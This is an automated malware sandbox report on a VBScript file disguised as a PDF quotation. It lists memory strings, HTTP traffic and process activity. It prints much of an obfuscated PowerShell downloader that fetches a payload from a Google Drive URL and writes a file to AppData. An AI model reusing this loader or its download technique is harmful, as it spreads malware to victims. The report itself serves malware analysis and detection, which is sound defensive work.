      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Sep 2024 07:58:07 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-465ryBlG48LPevoEgAOeSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AD-8ljsiWYEzLr6ofLG4ZMF1opB08n-7bb4fcPcr5gfQfkv8Q7apR4SWAxMAw87dLaD8xo-xRRUhJMqc5QServer: UploadServerSet-Cookie: NID=517=Fwd1-JrhNgK2fQ1sYnKrSyAJOSipDf7bur8VNRR2nqooRmfHzu2mybb2CpYyUCU3RxthKHwVEaBfjEjzZyRUfPI4rv2G-tr65LSHnZ50WHBcIjjL__MRwYzW1_9ROTErH3wUquwj--GDmPhmMQP-Nuk_YALaRfkh_LADyFmBLlBsFXlpHA; expires=Tue, 01-Apr-2025 07:58:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Sep 2024 07:58:13 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-IAkb1jTGa-76829Rq6bNpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AD-8ljt2X2d3s5aCRN26rZwTl8JX2GCulcw5i7dFO9FfqP40lyli4Ai4X8sJKX_IXXZ3TNTLOE6GSoFXtwServer: UploadServerSet-Cookie: NID=517=Swf_zx8RlvwN2Z-DKnzCL6Th7r4KGyBckaTRQ4j4hHKJD8Skdkdf5oNJP_fzibaNy5KcwZeC49JzvoFLeBUS1pFhoOYDELm1v6wTkR-7f2Qz2kCidIiR-peuH20Tiev7fimlcJUFpCETwwqhpljN3flIiR_tdyBthPbYmtKIZUx_Z83LpQ; expires=Tue, 01-Apr-2025 07:58:13 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digi
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.c
      Source: wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4R0
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: wscript.exe, 00000000.00000002.1351121003.00000194358A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.0000019433916000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/7
      Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.0000019433916000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/M
      Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.0000019433916000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab9
      Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c8e05410ddccb
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabT3
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj
      Source: wscript.exe, 00000000.00000003.1331955967.00000194338D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c8e05410dd
      Source: powershell.exe, 00000002.00000002.2609687458.000001D60154F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60179A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60102B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6016ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D601C74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
      Source: powershell.exe, 00000002.00000002.2631379660.000001D6101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000002.00000002.2609687458.000001D601C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
      Source: powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60175D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176sP
      Source: powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
      Source: powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com(
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6016ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
      Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2631379660.000001D6101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com

      System Summary

      Source: Initial file: Call Betalingsdatos.ShellExecute(Aeronautic, Glosseret, "", "", Milieuvenligste)
Source: Urgent Quotation Notification_pdf.vbs; Static file information: Suspicious name
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. 
';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und
Source: Urgent Quotation Notification_pdf.vbs; Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe; Process created: Commandline size = 5548
Source: classification engine; Classification label: mal88.expl.evad.winVBS@4/5@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Roaming\Bumpenes.sam
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jitc4mea.v5j.ps1
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs"
Source: C:\Windows\System32\wscript.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
